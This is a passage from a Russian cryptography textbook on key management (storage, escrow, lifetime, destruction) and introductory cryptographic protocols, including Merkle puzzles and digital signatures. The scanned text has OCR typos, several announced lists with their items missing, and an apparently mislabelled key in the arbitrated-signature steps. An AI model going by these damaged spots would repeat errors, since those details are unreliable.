К сожалению, данный метод не свободен от существенных недостатков. Во-первых, при его использовании противник может организовать крпптоаналитическую атаку со знанием открытого текста. Во-вторых, он облегчает вскрытие шифров с относительно коротким ключом (подобных DES-алгоритму). Криптоаналитику достаточно вычислить контрольные суммы для каждого возможного ключа, а затем использовать эти контрольные суммы для определения ключей, примененных при шифровании перехватываемых в дальнейшем сообщений. Чтобы избавиться от этих недостатков, к вычисленной контрольной сумме ключа каждый раз необходимо добавлять случайные или хотя бы различные биты.
Контроль за использованием ключей
Прогресс в области вычислительной техники идет семимильными шагами. Ныне даже персональные компьютеры повсеместно работают под управлением многозадачных операционных систем. В результате пользователь часто оказывается не в состоянии определить, когда операционная система прерывает выполнение его программы шифрования, записывает ее саму, а также все ее данные на диск и переключается на работу с другим приложением. После того как операционная система наконец возобновляет процесс шифрования, все выглядит вполне пристойно: пользователь даже не успевает осознать, что шифровальная программа вместе с используемым ею ключом побывала на диске. В итоге ключ так и останется на диске в незашифрованном виде, пока поверх него не будут записаны другие данные. Когда это случится — через полсекунды, через месяц или вообще никогда, не может сказать никто. Однако враг не дремлет, и вполне может произойти так, что ключ все еще будет храниться на диске в открытую, когда вражеский агент проверит этот диск в поисках полезной информации.
В некоторых случаях для организации обмена шифрованными сообщениями применяются сеансовые ключи. Они называются так потому, что используются лишь в одном сеансе связи, а затем уничтожаются. В результате вероятность их компрометации уменьшается. Еще больше понизить эту вероятность можно с помощью следующего метода.
К сгенерированному ключу (назовем его основным) добавляется битовый управляющий вектор (УВ), который содержит информацию об ограничениях, накладываемых на использование этого ключа. УВ подвергается хэшированию и затем складывается с основным ключом по модулю 2. Полученный результат служит в качестве ключа для зашифрования сеансового ключа. Зашифрованный сеансовый ключ хранится вместе с УВ. Чтобы получить сеансовый ключ в исходном виде, надо применить хэширование к УВ, сложить его с основным ключом по модулю 2 и использовать результат для расшифрования сеансового ключа. Достоинством этого метода является возможность задействовать УВ произвольной длины и открыто хранить его вместе с зашифрованным основным ключом.
Иногда при частой смене ключей оказывается очень неудобно каждый риз передавать их абонентам сети для использования при шифровании и расшифровании сообщений. В качестве выхода из этой неудобной ситуации можно предложить генерацию новых ключей из старых, называемую в криптографии обновлением ключей.
Если Иванов и Петров владеют общим криптографическим ключом, то, подав его на вход одной и той же однонаправленной функции, они получат одинаковый результат, из которого смогут выбрать необходимое число 6ит, чтобы составить из них новый ключ. Необходимо только помнить о том, что новый ключ будет обладать такой же стойкостью, что и старый. Если противник знает старый ключ, он может вычислить для этого ключа соответствующее значение однонаправленной функции и получить в свое распоряжение новый ключ.
Проще всего хранить ключи для криптосистемы, у которой имеется один-единственный пользователь. Пользователь просто запоминает этот ключ и при необходимости вводит его с клавиатуры компьютера по памяти. Однако поскольку по-настоящему случайный ключ запомнить нелегко, для его хранения можно использовать магнитную карточку, или пластиковый ключ с размещенным на нем ПЗУ (так называемый ПЗУ-ключ), или интеллектуальную карту. Для ввода такого ключа достаточно вставить его физический носитель в специальный считыватель, подключенный к компьютеру. При этом действительное значение вводимого ключа пользователю неизвестно, и, следовательно, он не сможет его разгласить или скомпрометировать. Способ использования ключа определяется управляющим вектором, записанным па физический носитель вместе с этим ключом.
ПЗУ-ключ придумали очень умные люди. Пользователь обычно гораздо лучше осознает, как правильно обращаться с обычным ключом от замка. Придание криптографическому ключу такого же вида, какой имеет ставший нам привычным замковый ключ, позволяет чисто интуитивно избегать многих ошибок, связанных с хранением криптографических ключей.
С целью дальнейшего уменьшения вероятности компрометации ключа можно разделить его на две части. Первую следует реализовать в виде ПЗУ-ключа, а вторую поместить в память компьютера. Тогда потеря "пэ-зэ-ушной" части ключа или его половинки, хранимой в памяти компьютера, не приведет к разглашению криптографического ключа в целом. А части ключа при необходимости можно заменить отдельно друг от друга.
Трудно запоминаемые ключи можно хранить на компьютерном диске в зашифрованном виде. Например, открытый ключ, состоящий из большого количества цифр, лучше всего зашифровать с помощью DES-алгоритма и запомнить на диске. Более короткий ключ к DES-алгоритму легче припомнить, когда понадобится расшифровать открытый ключ.
Если ключи генерируются с использованием хорошего датчика псевдослучайных битовых последовательностей, может оказаться более удобным не хранить сгенерированные ключи, а каждый раз заново генерировать их, задавая соответствующее начальное значение датчика, которое легко запоминается.
Запасные ключи
Рассмотрим такой возможный случай. Давид Ключкис, президент фирмы "Ключкис и К°", постоянно шифрует всю информацию, связанную с делами своей фирмы. Однако, к несчастью, он переходил улицу в неположенном месте, и его сбил 10-тонный грузовик. При этом больше всего пострадала та часть его организма, которая отвечала за хранение ключей к используемому им алгоритму шифрования. И если у Абрама Ключмана, первого заместителя Ключкиса, нет копии этих ключей, их фирма окажется в незавидном положении. Целью шифрования является защита информации от посторонних. Поэтому при условии, что Ключкис использовал стойкий криптографический алгоритм, зашифрованные им данные, касающиеся дел фирмы, будут потеряны навсегда.
Избежать этой ситуации Ключману поможет схема с депонированием ключей: все служащие компании, включая ее руководителей, должны регулярно сдавать копии своих криптографических ключей начальнику службы безопасности Бориса Ключевского, который будет класть их на хранение в сейф. Узнав, что Ключкис в бессознательном состоянии попал в больницу. Ключ-май просто попросит Ключевского принести требуемые криптографические ключи. Будет еще лучше, если Ключман узнает комбинацию, открывающую сейф, заранее, чтобы не оказаться в безвыходном положении, если впечатлительного Ключевского хватит удар, когда он узнает о несчастье, приключившемся с Ключкисом.
Недостаток этой схемы хранения запасных ключей состоит в том, что руководство фирмы вынуждено доверить все свои секреты Ключевскому. Взамен лучше разделить ключи на части и раздать их различным сотрудникам службы безопасности. В результате ни один из них не сможет получить единоличный доступ к зашифрованной информации. А еще лучше записать каждую часть ключа на отдельную интеллектуальную карту. Тогда их владельцы не только не будут знать значение части ключа, которая передана им на хранение, но и можно будет проконтролировать, сколько раз владелец конкретной интеллектуальной карты участвовал в получении целого ключа из частей для осуществления доступа к зашифрованной этим ключом информации.
Любой стойкий шифр обеспечивает надежную защиту только до тех пор, пока ключ к нему хранится в тайне. Если Иванов потеряет этот ключ, если у него этот ключ украдут, если этот ключ зачитает диктор в вечернем выпуске телевизионных новостей или этот ключ будет скомпрометирован каким-либо другим образом, обеспечиваемая им защита будет сведена на нет.
Скомпрометированный ключ к симметричному алгоритму шифрования необходимо побыстрее сменить. После этого остается только надеяться, что противник успел узнать из прочитанной шифрпереписки не слишком мною интересного для себя. С открытыми ключами, которые используются ко только для шифрования данных, но и для аутентификации и цифровой подписи документов, дело обстоит сложнее. Поэтому так важно, чтобы о компрометации открытого ключа все заинтересованные стороны узнали как можно скорее. Если все сообщения Иванова аккуратно снабжены датой, это поможет значительно уменьшить вероятность потенциального ущерба, поскольку тогда их получатели окажутся в состоянии отобрать и проверить те из них, которые могли быть сфальсифицированы.
Если Иванов не знает, когда именно был скомпрометирован его ключ, остается только посоветовать ему аккуратнее обращаться со своими ключами и использовать для разных целей различные ключи. Ведь входные двери в его офис и в его квартиру вряд ли открываются одним и тем же ключом.
Любой ключ должен использоваться в течение ограниченного периода времени. Тому есть несколько причин:
Продолжительность использования ключа зависит от криптосистемы. В различных криптосистемах эта продолжительность должна быть разной. Для шифрования речевых сообщений, передаваемых по телефону, имеет смысл менять ключ после каждого разговора. В выделенных каналах связи продолжительность использования ключа определяется ценностью шифруемой информации и скоростью ее передачи. При скорости в 9600 бит в секунду смену ключа следует производить реже, чем при скорости в несколько гига-бит в секунду. Если условия позволяют, такие ключи необходимо менять, по крайней мере, ежедневно.
Не требуют частой смены ключи шифрования ключей. Они используются от случая к случаю, и поэтому объем перехваченного противником шифртекста для них невелик. Кроме того, про свойства соответствующего ему открытого текста противнику заранее ничего не известно, поскольку хороший ключ представляет собой достаточно случайный набор бит. Однако компрометация ключа шифрования ключей влечет за собой гораздо более серьезные потери, чем это происходит при потере сеансового ключа или ключа шифрования данных. Необходим разумный компромисс между вероятностью вскрытия ключа шифрования ключей из-за его слишком длительного использования и возможностью компрометации этого ключа при его передаче абонентам сети связи. В большинстве случаев разумной представляется ежемесячная, а иногда даже ежегодная смена ключа шифрования ключей.
Ключи, применяемые для шифрования файлов, которые хранятся на компьютерных дисках, слишком часто менять не надо. Регулярное повторное шифрование файлов на новых ключах только даст больше полезной информации криптоаналитику, который будет пытаться их вскрыть. Лучше применить подход, при котором каждый файл шифруется при помощи своего ключа. А сами ключи, в свою очередь, зашифровываются на ключе шифрования ключей, который затем прячется в надежное место (например, в стальной сейф).
Что касается открытых ключей, то продолжительность их использования сильно варьируется в зависимости от области применения. Если открытый ключ применяется для целей аутентификации или для цифровой подписи, он продолжает оставаться актуальным годами, иногда даже десятилетиями. Но даже в этом случае не следует пренебрегать сменой ключа каждые 2—3 года, чтобы в распоряжении криптоаналитика накапливалось меньше шифртекста, необходимого для организации атаки. А старый ключ все равно надо продолжать хранить в секрете — он может понадобиться, чтобы, например, подтвердить подлинность подписи, поставленной в течение периода, пока этот ключ был действующим.
Использованные криптографические ключи ни в коем случае не должны попасть в руки противника. Поэтому, как только в ключах отпала надобность, их следует уничтожить. Если ключи хранятся на бумажном носителе, его надо сжечь или пропустить через специальный аппарат для уничтожения бумаг, который должен быть достаточно качественным. Ведь будет очень обидно, если ваш алгоритм шифрования, способный выдержать атаку методом грубой силы в течение нескольких миллионов лет, вскроют только потому, что за несколько десятков тысяч долларов кто-то наймет сотню безработных, и за год они соберут воедино недостаточно тщательно "пережеванный" лист бумаги с записанными на нем ключами.
Если ключ хранился в СППЗУ, необходимо несколько раз записать информацию поверх него. Если для хранения ключа использовалось ПЗУ. его надо разнести молотком на мелкие кусочки и пустить их по ветру. Если ключ лежал на компьютерном диске, на место ключа придется многократно записать ничего не значащие данные или уничтожить диск подобно ПЗУ. При работе на компьютере в многозадачном режиме следует обратить особое внимание на способность операционной системы создавать временные файлы на диске для хранения рабочей копии программы шифрования и ее данных. А сверх осторожный пользователь обязательно напишет программу, которая будет отыскивать копии ключа на свободных секторах диска и затем затирать их.
Глава 7. Криптографические протоколы
Что такое криптографический протокол
Протокол — это последовательность шагов, которые предпринимают две или большее количество сторон для совместного решения задачи. Все шаги следуют в порядке строгой очередности, и ни один из них не может быть сделан прежде, чем закончится предыдущий. Кроме того, любой протокол подразумевает участие, по крайней мере, двух сторон. В одиночку можно, например, смешать и выпить коктейль, но к протоколу это не имеет никакого отношения. Поэтому придется угостить кого-нибудь сделанным коктейлем, чтобы его приготовление и дегустация стали настоящим протоколом. И наконец протокол обязательно предназначен для достижения какой-то цели.
Протоколы имеют и другие отличительные черты:
Криптографическим протоколом называется такой, в основе которого лежи: криптографический алгоритм. Однако целью криптографического протокол;! зачастую является не только сохранение информации в тайне от посторонних. Участники криптографического протокола могут быть близкими друзьями, у которых нет друг от друга секретов, а могут являться настолько непримиримыми врагами, что каждый из них отказывается сообщить другому. какое сегодня число. Тем не менее, им может понадобиться поставить сноп подписи под совместным договором или удостоверить свою личность. В этом случае криптография нужна, чтобы предотвратить или обнаружим, подслушивание посторонними лицами, не являющимися участниками протокола, а также не допустить мошенничества. Поэтому часто требуется, чтобы криптографический протокол обеспечивал следующее: его участники не могут сделать или узнать больше того, что определено протоколом.
Зачем нужны криптографические протоколы
В повседневной жизни нам приходится сталкиваться с протоколами буквально на каждом шагу — играя в любые игры, делая покупки в магазинах или голосуя на выборах. Многими протоколами нас научили пользоваться родители, школьные учителя и друзья. Остальные мы сумели узнать самостоятельно.
В настоящее время люди все чаще контактируют друг с другом при помощи компьютеров. Компьютеры же, в отличие от большинства людей, в школу не ходили, у них не было родителей, да и учиться самостоятельно они не в состоянии. Поэтому компьютеры приходится снабжать формализованными протоколами, чтобы они смогли делать то, что люди выполняют особо не задумываясь. Например, если в магазине не окажется кассового аппарата, вы нее равно сможете купить в нем необходимую вещь. Однако такое кардинальное изменение протокола поставило бы бедный компьютер в полный тупик.
Большинство протоколов, которые люди используют при общении друг с другом с глазу на глаз, хорошо себя зарекомендовали только потому, что их участники имеют возможность вступить в непосредственный контакт. Взаимодействие с другими людьми через компьютерную сеть, наоборот, подразумевает анонимность. Будете ли вы играть с незнакомцем в преферанс, не видя, как он тасует колоду и раздает карты? Доверите ли вы своп деньги совершенно постороннему человеку, чтобы он купил вам что-нибудь в магазине? Пошлете ли вы свой бюллетень голосования по почте, зная, что с ним сможет ознакомиться любой из почтовых работников и потом рассказать всем о ваших нетрадиционных политических пристрастиях? Думаю, что нет.
Глупо считать, что компьютерные пользователи ведут себя более честно, чем абсолютно случайные люди. То же самое касается и сетевых администраторов, и проектировщиков компьютерных сетей. Большинство из них и в самом деле честные люди, однако есть и такие, кто может причинить нам большие неприятности. Поэтому так нужны криптографические протоколы. использование которых позволяет защититься от непорядочных людей.
Распределение ролей
Чтобы описание протоколов было более наглядным, имена их участников однозначно определяют роли, им уготованные (табл. 7.1). Пусть Антон и Борис принимают участие во всех двухсторонних протоколах. Как правило, начинает выполнение шагов, предусмотренных протоколом, Антон, а ответные действия предпринимает Борис. Если протокол является грех- или четырехсторонним, исполнение соответствующих ролей берут на себя Владимир и Георгий. Об остальных персонажах подробнее будет рассказано позже.
Таблица 7.1. Роли, которые играют участники протоколов
Участник протокола
Роль в протоколе
Антон
Первый участник протоколов
Борис
Второй участник протоколов
Владимир
Участник трех- и четырехсторонних протоколов
Георгий
Участник четырехсторонних протоколов
Дмитрий
Доверенное лицо, наделенное правами арбитра
Зиновий
Злоумышленник
Кирилл
Контролер
Олег
Охранник
Петр
Подслушивает за участниками протоколов
Сергей
Свидетель
Протокол с арбитражем
Арбитр — участник протокола, которому остальные участники полностью доверяют, предпринимая соответствующие действия для завершения очередного шага протокола. Это значит, что у арбитра нет личной заинтересованности в достижении тех или иных целей, преследуемых участниками протокола, и он не может выступить на стороне любого из них. Участники протокола также принимают на веру все, что скажет арбитр, и беспрекословно следуют всем его рекомендациям.
В протоколах, которым мы следуем в повседневной жизни, роль арбитра чаще играет адвокат. Однако попытки перенести протоколы с адвокатом в качестве арбитра из повседневной жизни в компьютерные сети наталкиваются на существенные препятствия.
Несмотря на отмеченные препятствия, протоколы с арбитражем находи г широкое применение на практике. В ходе дальнейшего изложения доверенное лицо, наделенное правами арбитра, будет именоваться Дмитрием.
Протокол с судейством
Чтобы снизить накладные расходы на арбитраж, протокол, в котором участвует арбитр, часто делится на две части. Первая полностью совпадает с обычным протоколом без арбитража, а ко второй прибегают только в случае возникновения разногласий между участниками. Для разрешения конфликтов между ними используется особый арбитр — судья.
Подобно арбитру, судья является незаинтересованным участником протокола, которому остальные участники доверяют. Однако в отличие от арбитра. судья участвует отнюдь не в каждом шаге протокола. Услугами судьи пользуются, только если требуется разрешить сомнения относительно правильности действий участников протокола. Если таких сомнений ни у кою не возникает, судейство не понадобится.
В компьютерных протоколах с судейством предусматривается наличие данных, проверив которые доверенное третье лицо может решить, не смошенничал ли кто-либо из участников этого протокола. Хороший протокол с судейством также позволяет выяснить, кто именно ведет себя нечестно Это служит прекрасным превентивным средством против мошенничества со стороны участников такого протокола.
Самоутверждающийся протокол
Самоутверждающийся протокол не требует присутствия арбитра для завершения каждого шага протокола. Он также не предусматривает наличие судьи для разрешения конфликтных ситуаций. Самоутверждающийся протокол устроен так, что, если один из его участников мошенничает, другие смогут моментально распознать нечестность, проявленную этим участником, и прекратить выполнение дальнейших шагов протокола.
Конечно же, хочется, чтобы существовал универсальный самоутверждающийся протокол на все случаи жизни. Однако на практике в каждом конкретном случае приходится конструировать свой специальный самоутверждающийся протокол.
Разновидности атак на протоколы
Атаки на протоколы бывают направлены против криптографических алгоритмов, которые в них задействованы, против криптографических методов, применяемых для их реализации, а также против самих протоколов. Для начала предположим, что используемые криптографические алгоритмы и методы являются достаточно стойкими, и рассмотрим атаки собственно на протоколы.
Если некто, не являющийся участником протокола, попытается подслушать информацию, которой обмениваются его участники, — это пассивная атака на протокол. Она так названа потому, что атакующий (будем именовать его Петром) может только накапливать данные и наблюдать за ходом событий, но не в состоянии влиять на него. Пассивная атака подобна криптоаналитической атаке со знанием только шифртекста. Поскольку участники протокола не обладают надежными средствами, позволяющими им определить, что они стали объектом пассивной атаки, для защиты от нее используются протоколы, дающие возможность предотвращать возможные неблагоприятные последствия пассивной атаки, а не распознавать ее.
Атакующий может попытаться внести изменения в протокол ради собственной выгоды. Он может выдать себя за участника протокола, внести изменения в сообщения, которыми обмениваются участники протокола, подменить информацию, которая хранится в компьютере и используется участниками протокола для принятия решений. Это активная атака на протокол, поскольку атакующий (назовем его Зиновием) может вмешиваться в процесс выполнения шагов протокола его участниками.
Итак, Петр пытается собрать максимум информации об участниках протокола и об их действиях. У Зиновия же совсем другие интересы — ухудшение производительности компьютерной сети, получение несанкционированного доступа к ее ресурсам, внесение искажений в базы данных. При этом и Петр, и Зиновий не обязательно являются совершенно посторонними лицами. Они могут быть легальными пользователями, системными и сетевыми администраторами, разработчиками программного обеспечения и даже участниками протокола, которые ведут себя непорядочно или даже вовсе не соблюдают этот протокол. В последнем случае атакующий называется мошенником. Пассивный мошенник следует всем правилам, которые определены протоколом, но при этом еще и пытается узнать о других участниках больше, чем предусмотрено этим протоколом. Активный мошенник вносит произвольные изменения в протокол, чтобы нечестным путем добиться для себя наибольшей выгоды.
Защита протокола от действий нескольких активных мошенников представляет собой весьма нетривиальную проблему. Тем не менее при некоторых условиях эту проблему удается решить, предоставив участникам протокола возможность вовремя распознать признаки активного мошенничества. А защиту от пассивного мошенничества должен предоставлять любой протокол вне зависимости от условий, в которые поставлены его участники.
Протокол обмена сообщениями с использованием симметричного шифрования
Предположим, что Антон и Борис хотят обмениваться секретными сообщениями по каналу связи, не защищенному от подслушивания. Естественно. им придется воспользоваться шифрованием. Однако чтобы Антон успешно зашифровал свое сообщение Борису, а тот, получив это сообщение, смог его расшифровать, они должны действовать в соответствии со следующим протоколом:
1. Антон и Борис уславливаются о том, какой криптосистемой они будут пользоваться.
2. Антон и Борис генерируют ключи для шифрования и расшифрования своих сообщений и затем обмениваются ими.
3. Антон шифрует сообщение с использованием криптографического алгоритма и ключа, о которых он заранее договорился с Борисом.
4. Антон отправляет зашифрованное сообщение Борису.
5. Борис расшифровывает полученное сообщение, применяя тот же криптографический алгоритм и ключ, которыми пользовался Антон.
Если Петр имеет возможность перехватывать сообщения, которые передают друг другу Антон и Борис, он может попытаться прочесть эти сообщения. Если Антон и Борис используют стойкий алгоритм шифрования. — они в безопасности. Однако Петр может оказаться в состоянии подслушивать за Антоном и Борисом, когда они выполняют шаг 1 и шаг 2 протокола. Поэтому стойкая криптосистема не должна опираться на сохранение в тайне алгоритма шифрования. Необходимо, чтобы ее стойкость определялась одной только длиной секретного ключа. Тогда Антон и Борис могут условиться, каким шифром они будут пользоваться, ничуть не заботясь о том, что их подслушает Петр. Тем не менее, шаг 2 протокола все равно должен выполняться ими в обстановке строжайшей секретности. Требуется, чтобы свои сгенерированные ключи Антон и Борис хранили в секрете до, во время и после процесса выполнения всех шагов протокола. Иначе Петр сможет прочесть всю их шифрованную переписку.
Что касается Зиновия, то в зависимости от преследуемых целей он может действовать по-разному. Если Зиновий прервет связь между Антоном и Борисом, они будут не в состоянии обмениваться сообщениями. Зиновий может заменить шифрованное сообщение, посланное Антоном, на свое собственное. Попытавшись расшифровать поддельное сообщение, Борис вместо осмысленного открытого текста получит абракадабру, и решит, что Антон не слишком серьезно отнесся к шифрованию своего сообщения или что при передаче оно было просто искажено. Хуже, если Зиновий узнает ключ, которым пользуются Антон и Борис. Тогда он сможет зашифровать любое сообщение и отправить его Борису от имени Антона, а у Бориса не будет возможности распознать подделку.
Если Антон вознамерится навредить Борису, тот будет не в силах ему помешать. Например, Антон может заставить Бориса отказаться от обмена сообщениями. Для этого Антону достаточно передать копию ключа Петру с условием, что Петр опубликует открытые тексты сообщений Бориса в газете для всеобщего обозрения. Это значит, что, используя приведенный выше протокол, Антон и Борис должны полностью доверять друг другу.
Подводя итог сказанному, следует еще раз подчеркнуть, что в протоколах обмена сообщениями с использованием симметричного шифрования ключи должны храниться и распределяться между участниками протокола в строжайшем секрете. Ключи являются не менее ценными, чем сама информация, которая шифруется с их использованием, поскольку знание ключей противником открывает ему неограниченный доступ к этой информации.
Протокол обмена сообщениями с использованием шифрования с открытым ключом
Симметричную криптосистему можно сравнить с сейфом. Криптографический ключ соответствует комбинации, отпирающей сейф. Каждый, кто знает комбинацию, может открыть сейф. Тому, кто комбинацией не владеет, но все равно желает знакомиться с содержимым сейфа, лучше записаться на курсы медвежатников, если таковые, конечно, существуют.
В 1976 г. американские криптологи У. Диффи и М. Хеллман изобрели криптографию с открытым ключом. Они предложили использовать два вида ключей — открытые и тайные. Вычислить тайный ключ, зная только открытый, очень сложно. Человек, владеющий открытым ключом, может с его помощью зашифровать сообщение. Расшифровать это сообщение в состоянии только тот, кто имеет соответствующий тайный ключ. В отличие от симметричной криптосистемы, для алгоритма шифрования с открытым ключом больше подходит сравнение с почтовым ящиком. Опустить почту и этот ящик очень просто, равно как и зашифровать сообщение с применением открытого ключа. А извлечение из почтового ящика находящейся в нем корреспонденции сродни расшифрованию сообщения. Желающего сделать это без ключа вряд ли ожидает легкая работа. Обладатель же ключа откроет почтовый ящик, т. е. расшифрует сообщение, без особого труда.
При зашифровании и расшифровании сообщений в криптосистеме с открытым ключом используется однонаправленная функция с лазейкой. Причем зашифрование соответствует вычислению значения этой функции, а расшифрование — ее обращению. Поскольку и открытый ключ, и сама функция не являются секретными, каждый может зашифровать свое сообщение с их помощью. Однако обратить функцию, чтобы получить открытый текст зашифрованного сообщение, в разумные сроки не сможет никто. Для этого необходимо знать лазейку, т. е. тайный ключ. Тогда расшифрование будет таким же легким, как и зашифрование.
Протокол обмена сообщениями с использованием шифрования с открытым ключом выглядит следующим образом:
Применение криптографии с открытым ключом позволяет решить проблему передачи ключей, которая присуща симметричным криптосистемам. Без какой-либо предварительной подготовки Антон может отправить зашифрованное сообщение Борису. И хотя в распоряжении Петра окажутся и сам алгоритм шифрования, и зашифрованное Антоном сообщение, и лаже использованный им для этого ключ, Петр все равно не сможет расшифровать данное сообщение.
Чтобы упростить протокол обмена шифрованными сообщениями, открытые ключи всех абонентов единой сети связи часто помещаются в справочную базу данных, находящуюся в общем пользовании этих абонентов. Тогда протокол обмена сообщениями с использованием шифрования с открытым ключом имеет следующий вид:
1. Антон находит открытый ключ Бориса в базе данных.
2. Антон шифрует открытый текст своего сообщения при помощи открытого ключа Бориса.
3. Борис расшифровывает сообщение Антона, используя свой тайный ключ.
Второй протокол в большей степени напоминает отправку писем по почте, поскольку получатель сообщения не является участником протокола до тех самых пор, пока не захочет ознакомиться с открытым текстом этого сообщения.
Гибридные криптосистемы
На практике криптосистемы с открытым ключом используются для шифрования не сообщений, а ключей. На это есть две основные причины:
Чем меньше количество ( n ) возможных открытых текстов, тем эффективнее будет атака на криптосистему с открытым ключом. Например, если криптоаналитику известно, что шифрованию подверглась сумма сделки, не превышающая 1 млн долл., он может перебрать все числа от 1 до 1 000 000.
В большинстве случаев криптографические алгоритмы с открытым ключом применяются для шифрования сеансовых ключей при их передаче абонентам сети связи. Соответствующий протокол выглядит обычно так:
1. Антон генерирует сеансовый ключ К и шифрует его с использованием открытого ключа В, принадлежащего Борису:
Е В (К)
2. Борис расшифровывает сообщение Антона при помощи своего тайного ключа и получает в результате сеансовый ключ К. сгенерированный Антоном:
K=D B (E B (K))
3. Антон и Борис обмениваются сообщениями, зашифрованными одним и тем же сеансовым ключом К.
Данный протокол позволяет не хранить ключи в течение неопределенного периода времени до тех пор, пока они не понадобятся в очередном сеансе связи. Сеансовый ключ можно сгенерировать и отправить по требуемому ; адресу непосредственно перед посылкой сообщения, которое предполагается зашифровать на этом ключе, а потом его сразу уничтожить. Тем самым уменьшается вероятность компрометации сеансового ключа. И хотя тайным ключ также может быть скомпрометирован, риск здесь значительно меньше поскольку тайный ключ используется очень редко — только для однократного зашифрования сеансового ключа.
"Шарады" Меркля
Оригинальный протокол обмена ключами был предложен американским криптологом Р. Мерклем (R.-Merkle) в 1974 г. Данный протокол основывается на так называемых "шарадах", которые требуется решить для получения ключа. Это гораздо легче сделать отправителю и получателю шифрованных сообщений, чем криптоаналитику, перехватывающему их. В результате Антон может послать шифрованное сообщение Борису, предварительно не передавая ему секретного ключа:
1. Борис генерирует 2 20 (около 1 млн) сообщений вида: "Это шарада под номером х. Это секретный ключ под номером у", где х — случайное число, у— случайный секретный ключ. Пара х, у является уникальной для каждого сообщения. Затем Борис шифрует все эти сообщения при помощи какого-либо симметричного алгоритма на различных 20-битных ключах и отсылает Антону.
2. Антон случайным образом выбирает одно из шифрованных сообщений, присланных Борисом, и методом тотального перебора получает открытый текст этого сообщения.
3. Антон шифрует свое собственное секретное сообщение при помощи другого симметричного алгоритма на ключе у, вскрытом им методом тотального перебора, и посылает это сообщение вместе с соответствующим х.
4. Борис, зная соответствие между х и у, расшифровывает сообщение, пришедшее ему от Антона.
Конечно же, Петр может вскрыть ключ, который был использован Антоном для зашифрования секретного сообщения, однако для этого Петру придется выполнить значительно больший объем вычислений, чем Антону и Борису Петр должен будет прочесть все 2 20 шифрованных сообщений, отправленных Борисом, чтобы найти у, соответствующее значению х, выбранному Антоном. На решение этих "шарад" Петр потратит примерно квадрат времени. которое потребуется Антону и Борису, чтобы их составить. И хотя такое отличие в трудоемкости по криптографическим меркам довольно невелико, в некоторых случаях этого может оказаться достаточно. Например, если Антон и Борис смогут опробовать по 10 тыс. ключей в секунду, им понадобится немногим более 1 минуты, чтобы ключ шифрования у оказался в руках Антона. В то же время у Петра, обладающего примерно такой же вычислительной мощью для опробования ключей, как Антон и Борис, на вскрытие правильного ключа уйдет больше года.
Цифровая подпись
Собственноручная подпись под документом с давних пор используется людьми в качестве доказательства того факта, что человек, подписавший данный документ, ознакомился и согласен с его содержанием. Почему же подпись заслужила такое доверие со стороны человечества? Перечислим основные причины.
На самом деле, ни одно из перечисленных свойств подписи не выполняется на все 100%. Подписи подделываются и копируются, от них отрекаются, а в уже подписанные документы впоследствии вносятся произвольные изменения. Однако люди вынуждены мириться с недостатками, присущими подписи, поскольку мошеннические трюки с подписями проделывать не так-то просто и шансы быть пойманными у таких мошенников достаточно велики.
Попытка использовать подпись в компьютерных файлах сопряжена с еще большими трудностями. Во-первых, любой файл может быть скопирован вместе с имеющейся в нем подписью. Во-вторых, после подписания в файл можно внести любые изменения, которые в принципе не поддаются обнаружению.
Подписание документов при помощи симметричных криптосистем и арбитра
Предположим, что Антон должен послать подписанное им цифровое сообщение Борису. Для этого потребуются симметричная криптосистема и арбитр Дмитрий, который может обмениваться шифрованной информацией и с Антоном, и с Борисом. Чтобы общаться с Антоном, Дмитрий использует ключ К А, а сообщения, предназначенные Борису, Дмитрий шифрует с помощью ключа К Б считается, что передача ключей всем заинтересованным сторонам произошла еще до того, как у Антона появилась потребность отправить Борису подписанный цифровой документ. Тогда Антон. Борис и Дмитрий могут действовать в соответствии со следующим протоколом:
1. Антон шифрует свое сообщение Борису на ключе К А и посылает это сообщение Дмитрию.
2. Дмитрий расшифровывает полученное сообщение, присоединяет к нему собственное заявление о принадлежности этого сообщения Антону, шифрует сообщение Антона и свое заявление на ключе К Б , а затем отправляет их Борису.
3. Борис расшифровывает сообщение, пришедшее от Дмитрия. В результате Борис может прочесть как открытый текст сообщения Антона, так и подтверждение того факта, что этот текст принадлежит Антону.
Дмитрий уверен в том, что автором полученного сообщения является Антон. поскольку лишь Антон владеет секретным ключом К А и, следовательно. только он мог зашифровать это сообщение с помощью К А .
Данный протокол позволяет удостоверять принадлежность цифровою документа конкретному лицу подобно тому, как это делается при помощи анализа его собственноручной подписи, но при одном важном условии: Дмитрий пользуется абсолютным доверием со стороны всех без исключения участников протокола, поэтому что бы он ни сказал, принимается остальными на веру без тени сомнения.
Если Борис захочет продемонстрировать документ, подписанный Антоном. кому-нибудь еще, например, Владимиру, им всем снова придется прибегнуть к услугам вездесущего и кристально честного Дмитрия:
1. Борис шифрует сообщение Антона и заявление Дмитрия о том, что это сообщение действительно пришло от Антона, с помощью ключа К Б и отсылает их Дмитрию.
2. Дмитрий расшифровывает полученное от Бориса сообщение, заглядывает в свой архив и убеждается, что Борис не внес никаких изменений в исходный открытый текст сообщения Антона.
3. Дмитрий зашифровывает сообщение Бориса с помощью ключа К Б , используемого для связи с Владимиром, и шлет это сообщение Владимиру.
4. Владимир расшифровывает сообщение Дмитрия и получает как открытый текст сообщения Антона, так и подтверждение того факта, что лея текст на самом деле принадлежит Антону.
Заметим, что от протокола к протоколу у Дмитрия появляется все больше обязанностей. Он шифрует и расшифровывает сообщения, сравнивает их между собой, дописывает к ним заявления об их авторстве, ведет архив сообщений и разрешает возникающие конфликты. При этом Дмитрий не может допустить ни малейшей ошибки, поскольку иначе он безвозвратно утратит доверие остальных участников протокола. Да и проникновение злоумышленника Зиновия в архив Дмитрия чревато последствиями, которые надолго отобьют у всех охоту ставить свои подписи под цифровыми документами. Поэтому практическое использование подписей, которые заверяются при помощи симметричной криптосистемы и арбитра, является весьма ограниченным.
Подписание документов при помощи криптосистем с открытым ключом
Протокол подписания документа при помощи криптосистемы с открытым ключом достаточно незатейлив:
1. Антон шифрует документ с использованием тайного ключа, тем самым проставляя под этим документом свою подпись, и отправляет ею Борису.
2. Борис расшифровывает документ с использованием открытого ключа Антона, тем самым проверяя подлинность подписи.
От Дмитрия здесь совершенно не требуется вести обширную шифрованную переписку с участниками протокола. Он даже не нужен, чтобы проверять подлинность подписи. Если Борис не сможет расшифровать документ с использованием открытого ключа, принадлежащего Антону, значит, подпись под этим документом недействительна. Тем не менее, Дмитрий понадобится, чтобы удостовериться, что открытый ключ Антона действительно принадлежит именно Антону.
Отметка о времени подписания документа
